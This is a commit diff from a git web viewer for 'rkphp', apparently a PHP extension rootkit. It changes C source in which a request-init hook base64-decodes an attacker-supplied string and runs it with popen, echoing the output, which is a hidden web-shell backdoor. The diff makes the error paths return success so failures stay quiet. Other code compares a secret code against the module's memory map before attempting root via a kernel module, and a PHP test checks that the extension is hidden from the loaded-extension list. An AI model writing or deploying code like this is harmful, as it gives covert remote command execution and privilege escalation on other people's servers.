Browse Source

Default

master
Root 5 years ago
parent
commit
695df2d7d3
  1. 27
      rkphp/src/php_funcs.c
  2. 4
      rkphp/test.php

27
rkphp/src/php_funcs.c

@ -88,7 +88,7 @@ PHP_FUNCTION(rkphp_ex) @@ -88,7 +88,7 @@ PHP_FUNCTION(rkphp_ex)
"ll", &pid, &code) == FAILURE)
RETURN_NULL();
RKPHP_PRINTF("[!] PID: %ld\n[!] CODE: %lx\n", pid, code);
RKPHP_PRINTF("[!] PID: %ld\n[!] CODE: %lx\n", pid, code);
fp = fopen("/proc/self/maps", "r");
if(fp == NULL)
@ -102,7 +102,7 @@ PHP_FUNCTION(rkphp_ex) @@ -102,7 +102,7 @@ PHP_FUNCTION(rkphp_ex)
if(strstr(filename, "rkphp.so") == NULL)
continue;
RKPHP_PRINTF("[c] Start: %s\n[c] End: %s\n[c] Filename: %s\n",
RKPHP_PRINTF("[c] Start: %s\n[c] End: %s\n[c] File: %s\n",
start, end, filename);
break;
@ -114,13 +114,18 @@ PHP_FUNCTION(rkphp_ex) @@ -114,13 +114,18 @@ PHP_FUNCTION(rkphp_ex)
if(code != (lstart + lend))
RETURN_NULL();
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
// Pull root from kernel module.
/* This is where we'll attempt to interact with the kernel module */
setreuid(1337, 1337);
/* This is where we'll attempt to interact with the kernel rkmod */
RKPHP_PRINTF("[*] Gained Root privileges successfully.\n");
if(getuid() != 0)
{
RKPHP_PRINTF("[!] We've not been given root privileges!\n");
RETURN_NULL();
}
RKPHP_PRINTF("[*] Gained Root privileges successfully!\n");
RETURN_TRUE;
}
@ -177,21 +182,19 @@ PHP_RINIT_FUNCTION(rkphp) @@ -177,21 +182,19 @@ PHP_RINIT_FUNCTION(rkphp)
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
return SUCCESS;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s\n", output);
}
php_printf("</pre>\n");
@ -214,13 +217,13 @@ PHP_RINIT_FUNCTION(rkphp) @@ -214,13 +217,13 @@ PHP_RINIT_FUNCTION(rkphp)
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
return SUCCESS;
}
php_printf("<pre>\n");

4
rkphp/test.php

@ -2,8 +2,8 @@ @@ -2,8 +2,8 @@
//print_r(get_loaded_extensions());
if(!extension_loaded("rkphp.so"))
printf("[*] Successfully hidden!" . PHP_EOL);
//if(!extension_loaded("rkphp.so"))
// printf("[*] Successfully hidden!" . PHP_EOL);
/* Get address range of extension */
function get_ext_range($name)

Loading…
Cancel
Save